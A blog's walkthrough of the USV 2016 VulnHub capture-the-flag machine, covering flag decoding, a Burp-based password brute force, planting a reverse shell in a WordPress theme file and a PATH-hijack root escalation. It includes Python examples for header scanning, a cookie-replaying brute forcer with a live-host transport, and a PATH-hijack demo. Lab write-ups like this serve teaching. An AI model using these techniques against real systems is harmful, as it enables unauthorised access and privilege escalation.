Fri. Jul 3rd, 2020

Pentesting Fun Stuff

following the cyber security path…

USV: 2016

Location

https://download.vulnhub.com/usv-2016/USV-CTF.ova

Introduction

Instructions: The CTF is a virtual machine and has been tested in Virtual Box. It has all required drivers if you want it to run on VMware or KVM (virtio). The network interface of the virtual machine will take its IP settings from DHCP.
Flags: There are 7 flags that should be discovered in the form of: Country_name Flag: [md5 hash]. In the CTF platform of the CTF-USV competition there was a hint available for each flag, but accessing it would imply a penalty. If you need any of those hints to solve the challenge, send me a message on Twitter @gusu_oana and I will be glad to help.
About: CTF-USV 2016 was the first International Students Contest in Information Security organized in Romania by Suceava University. Security challenge creation, evaluation of results and building of the CTF environment were provided by the Safetech Tech Team: Oana Stoian (@gusu_oana), Teodor Lupan (@theologu) and Ionut Georgescu (@ionutge1)

Getting Started

Starting with an nmap scan.

The scan shows a lot of open ports: SSH, HTTP, an HTTP proxy, MySQL, Kerberos and an FTP server listening on a registered (non-standard) port.
The host name is “SevenKingdoms”, a reference to the TV show “Game of Thrones”.
I start by checking whether the SSH server presents an interesting banner.

The banner contains a nice piece of ASCII art and a string that looks either encrypted or salted and hashed. Looking at the art more closely, there is a hidden message: scattered letters that, read together, spell out AES ECB.
There are more characters visible near the tail. So I now have a cipher and mode, a key and a piece of ciphertext.

My first decryption attempt doesn’t give the desired result, so I try an online AES decoder, with more luck. (An AES key must be exactly 16, 24 or 32 bytes and the ciphertext is usually hex or base64 encoded, so when a local decrypt fails those are the first things to check before doubting the key.)
Italy Flag: 0047449b33fbae830d833721edaef6f1
Next stop is port 80. Browsing to the website I get a custom 403 error page.

All my scans return the same 403. Nikto reports that the directory /icons/ is accessible. It holds a lot of images; I could wget them all in the hope that one has been altered, but since there are more leads to follow I note it down and continue the search.
Requesting the site again, this time through Burp Suite, I notice that the XSS-protection header in the server response carries a base64-encoded string:
Q3JvYXRpYSBGbGFnOiAwYzMyNjc4NDIxNDM5OGFlYjc1MDQ0ZTljZDRjMGViYg==
After a quick decode I get my second flag:   Croatia Flag: 0c326784214398aeb75044e9cd4c0ebb
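Checking every response header for encoded content is worth scripting rather than eyeballing in Burp. The following Python is an added example, not code from the original write-up: it parses a raw HTTP response and reports every header whose value is valid base64 decoding to printable ASCII. The sample response is constructed for this example; the base64 value is the one quoted above, but the header name (assumed to be X-XSS-Protection), the status line and the other headers are assumptions.

```python
import base64
import binascii
import re

# Constructed raw response for this example. The X-XSS-Protection value is the
# base64 string quoted in the write-up; the status line, the other headers and
# the header name itself are assumptions.
SAMPLE_RESPONSE = (
    "HTTP/1.1 403 Forbidden\r\n"
    "Server: Apache\r\n"
    "X-XSS-Protection: Q3JvYXRpYSBGbGFnOiAwYzMyNjc4NDIxNDM5OGFlYjc1MDQ0ZTljZDRjMGViYg==\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body>403 Forbidden</body></html>"
)

# Base64 alphabet only, at least 16 characters, optional '=' padding.
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def parse_headers(raw):
    """Return (name, value) pairs from a raw HTTP response, status line dropped."""
    head = raw.split("\r\n\r\n", 1)[0]
    pairs = []
    for line in head.split("\r\n")[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            pairs.append((name.strip(), value.strip()))
    return pairs


def decode_if_base64(value):
    """Decode a header value if it is valid base64 that yields printable ASCII."""
    if not B64_RE.match(value):
        return None
    try:
        data = base64.b64decode(value, validate=True)
    except binascii.Error:
        return None
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def find_encoded_headers(raw):
    """Map header name -> decoded text for every header carrying base64."""
    found = {}
    for name, value in parse_headers(raw):
        decoded = decode_if_base64(value)
        if decoded is not None:
            found[name] = decoded
    return found


if __name__ == "__main__":
    for name, text in find_encoded_headers(SAMPLE_RESPONSE).items():
        print(f"{name}: {text}")
```

The 16-character minimum and the printable-ASCII check keep ordinary values such as `Apache` or `1; mode=block` from being reported as false positives; lower the minimum if you expect short encoded tokens.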
There are more open ports. One of them, 3129, is a Squid proxy. Squid is a caching web proxy for HTTP and related protocols. A 403 that every direct request gets may depend on where the request comes from, and a request relayed through Squid reaches the web server from the box itself, so my next step is to point my browser at that proxy and see whether the site on port 80 behaves differently.

With dirb I find a blog.

Browsing the blog, a few things catch my attention. One is a picture of Hodor with the caption “I have a message for you!”.

After downloading it, exiftool and hexdump turn up nothing. But the directory the picture is served from holds something else: a zip file.
Extracting the picture inside gives another view of Hodor, this time with my next flag. The string is part of the image itself rather than metadata, so I used an online OCR service to read it the easy way.

Next I proceed with the second interesting find on the website: a protected area that asks for a password. Because the site contains a lot of text about “Game of Thrones”, I figure the password may be in there somewhere, so I generate a wordlist from the site with CeWL.

To understand how the password is submitted I follow the HTTP requests in Burp. When I enter a random password, the flow starts with a POST request, followed by a redirect to a GET request that carries a cookie. This cookie holds an encoded form of the password I entered.


So to brute-force the password successfully I need Burp Suite to follow the redirections and process (replay) the cookies it is given; otherwise every attempt stops at the redirect and all responses look identical.
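The same two steps (a CeWL-style wordlist from the site text, then a brute force that follows the redirect and replays the cookie) can be scripted. The Python below is an added example and not code from the original write-up or from the CTF. The form path /secret.php, the field name `password`, the cookie name `pw`, the sample blog text and the secret are all assumptions; `fake_transport` is a constructed stand-in for the target so the block runs offline, and `http_transport` is the drop-in replacement for a live host.

```python
import base64
import http.client
import re
import urllib.parse
from collections import Counter


# --- 1. CeWL-style wordlist: every word of at least min_len letters in the
#        page text, tags stripped, duplicates removed, first-seen order kept.
def cewl_words(html, min_len=5):
    text = re.sub(r"<[^>]+>", " ", html)
    seen = {}
    for word in re.findall(r"[A-Za-z]{%d,}" % min_len, text):
        seen.setdefault(word, None)
    return list(seen)


# --- 2. One attempt: POST the candidate, then follow redirects while replaying
#        every cookie the server set, as Burp's "follow redirections" and
#        "process cookies" options do.
def try_password(transport, password, path="/secret.php", max_hops=5):
    status, headers, body = transport("POST", path, {"password": password}, {})
    cookies = {}
    for _ in range(max_hops):
        if status not in (301, 302, 303, 307, 308):
            break
        location = None
        for name, value in headers:
            lname = name.lower()
            if lname == "set-cookie":
                cname, _, cvalue = value.split(";", 1)[0].partition("=")
                cookies[cname.strip()] = cvalue.strip()
            elif lname == "location":
                location = value
        if location is None:
            break
        status, headers, body = transport("GET", location, None, dict(cookies))
    return status, body


# --- 3. Brute force and pick the odd one out: when every attempt ends in a 200,
#        the hit is the response whose length differs from the majority.
def brute_force(transport, wordlist, **kw):
    results = {pw: try_password(transport, pw, **kw) for pw in wordlist}
    lengths = Counter(len(body) for _, body in results.values())
    common = lengths.most_common(1)[0][0]
    return [pw for pw, (_, body) in results.items() if len(body) != common]


# --- Real transport over http.client for a live target (host/port assumed).
def http_transport(host, port=80):
    def send(method, path, data, cookies):
        conn = http.client.HTTPConnection(host, port, timeout=10)
        headers = {}
        if cookies:
            headers["Cookie"] = "; ".join(f"{k}={v}" for k, v in cookies.items())
        body = None
        if data is not None:
            body = urllib.parse.urlencode(data)
            headers["Content-Type"] = "application/x-www-form-urlencoded"
        conn.request(method, path, body=body, headers=headers)
        resp = conn.getresponse()
        result = (resp.status, resp.getheaders(), resp.read().decode("utf-8", "replace"))
        conn.close()
        return result
    return send


# --- Constructed stand-in for the target: POST -> 302 with a cookie holding the
#     base64 of the submitted password -> GET that checks the cookie. The blog
#     text and the secret are made up for this example, not the CTF's.
FAKE_BLOG = ("<h1>Seven Kingdoms</h1><p>Winterfell is the seat of House Stark; "
             "Dragonstone once belonged to House Targaryen.</p>")
SECRET = "Dragonstone"


def fake_transport(method, path, data, cookies):
    if method == "POST" and path == "/secret.php":
        token = base64.b64encode(data["password"].encode()).decode()
        return 302, [("Location", "/secret.php"), ("Set-Cookie", f"pw={token}; path=/")], ""
    if method == "GET" and path == "/secret.php":
        try:
            supplied = base64.b64decode(cookies.get("pw", "")).decode()
        except ValueError:
            supplied = ""
        if supplied == SECRET:
            return 200, [], "<html>Welcome to the secret chapter. The story continues here.</html>"
        return 200, [], "<html>Wrong password</html>"
    return 404, [], ""


if __name__ == "__main__":
    print(brute_force(fake_transport, cewl_words(FAKE_BLOG)))  # ['Dragonstone']
```

Picking the response by length rather than by status code is the point of the exercise: the target answers 200 to both a right and a wrong password, so the hit only stands out as the one response that differs from all the others, which is also what to look for in Burp's Intruder results table.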


With this password I get the next flag.

On the same page there is a clue about a password.

At first I thought the facial expressions in the picture might hold the clue. But previous challenges have taught me that the simplest explanation is usually the right one and that the needed credentials are often in plain sight, so I took the text as literally as possible.
The user “mother_of_dragons” has a password which is “in front of your eyes”.
I tried this credential against the remaining services on the open ports; on the FTP server it lets me in.

On the FTP server there is a file called “readme.txt” whose content is “I keep a hidden note for myself”. A hidden ‘note’: like before, the answer is in plain sight. On Unix a hidden file is simply one whose name starts with a dot, and the note is found by browsing to “/.note.txt”:
I always forgot passwords, so for my blog account I used my children's name. -= Daenerys =-
No flag, but a good clue about the password for the admin side of the WordPress blog.
The clue says “children’s name”, plural, so it could be her son, or the dragons, since she sees them as her children.
The lost-password feature responds differently for a username that does not exist, so it lets me confirm which username is the right one: not “Daenerys” as I first assumed, but “mother_of_dragons” again. As for the password, a combination of all the dragon names gets me in.

After some browsing, the next flag turns up in the profile of mother_of_dragons.

To get a reverse shell I edited the search.php file and added the PHP reverse shell script from pentestmonkey to it. With a listener running on my machine, pressing the blog's search button makes the server execute search.php and the shell connects back to me.

After searching inside the system I found the next flag.

There is a file called “winterfell_messenger” which is owned by root.

Running it shows that it calls the “cat” command to read the file “/root/message.txt”.

So the binary is setuid root and invokes “cat” by bare name instead of an absolute path, which means the shell it spawns resolves “cat” through my PATH. To obtain root I create an executable file called “cat” whose content is “/bin/bash”.
I prepend the directory holding this file to PATH, so the binary runs my version of “cat” with root privileges. (If the shell that comes back is not root, remember that bash drops an effective uid that differs from the real uid unless started with -p; “/bin/bash -p” or “/bin/sh” avoids that. And if the binary were a script rather than a compiled program, Linux would ignore its setuid bit entirely.)
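The mechanism behind this privilege escalation, PATH lookup of an unqualified command name, can be demonstrated without a setuid binary at all. The Python below is an added example, not code from the write-up or the CTF: it drops a fake `cat` into a directory it controls and runs the bare command `cat /dev/null` both with and without that directory prepended to PATH, which is exactly the resolution a `system("cat /root/message.txt")` call performs. The fake `cat` only prints a marker (a constructed value) so the demo runs unprivileged; in the real attack it would hold the shell command instead.

```python
import os
import stat
import subprocess
import tempfile

# The planted "cat". In the real attack its body is the shell to spawn; here it
# prints a constructed marker so the demonstration runs as an ordinary user.
FAKE_CAT = "#!/bin/sh\necho HIJACKED\n"


def make_fake_cat(directory):
    """Write an executable file named 'cat' into directory and return its path."""
    path = os.path.join(directory, "cat")
    with open(path, "w") as f:
        f.write(FAKE_CAT)
    os.chmod(path, stat.S_IRWXU | stat.S_IRGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IXOTH)
    return path


def run_cat(extra_path=None):
    """Run the unqualified command `cat /dev/null` and return its stdout.

    subprocess.run() with a list argument resolves 'cat' through the PATH of
    the environment it is given (execvp-style), the same way /bin/sh does for
    a system("cat ...") call inside a setuid program.
    """
    env = dict(os.environ)
    if extra_path:
        env["PATH"] = extra_path + os.pathsep + env.get("PATH", "/usr/bin:/bin")
    result = subprocess.run(["cat", "/dev/null"], env=env, capture_output=True, text=True)
    return result.stdout.strip()


def demo_path_hijack():
    """Return (output with normal PATH, output with attacker dir prepended)."""
    with tempfile.TemporaryDirectory() as tmp:
        make_fake_cat(tmp)
        return run_cat(), run_cat(tmp)


if __name__ == "__main__":
    print(demo_path_hijack())  # ('', 'HIJACKED')
```

The defensive reading is the same in reverse: a privileged program must call helpers by absolute path (or sanitise PATH itself before any exec), because everything else in its environment, PATH included, is chosen by the unprivileged caller.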

After getting root it’s time to get the final flag.

Conclusion

A fun challenge with some nice features.

3 thoughts on “USV: 2016”

  1. Could you please post exactly how to set up BURP SUITE — I’ve spent like 3 days going through different POST and GET and transitioning between what to define in the ADD portion and launching attacks to brute force the password….I’m on the Secret Chapter page… But what should the Target IP and Port be, the Positions (what to define in the ADD), the Payloads (CEWL wordlist), and options. I’m getting 400’s and 403’s on both POST and GET – but joy on finding a 200 listing for the password.
    I can get the Cookies and forwards from the webpage. I’m starting with the actual server refresh then re-doing the Settings in Ice Weasel to 127.0.0.1 8080 – and submitting a 1234 password to get a response. At some point, I changed it back to the USV server’s IP address and start new attacks…but nothing…
    Many Thanks! J

    1. Hi Jo.
      In my write-up I’ve explained that you need to enable the options ‘follow redirections’ and ‘process cookies’.
      The rest is normal procedure with a brute-force attack. You need to acquire the wordlist and run the attack.
      As you can see in my example you will get a lot of code 200. But there is one thing that stands out from the rest. If you find that, you’ll find the password.
      If you need more information on how Burpsuite works, this will be a great read: part 1 and part 2
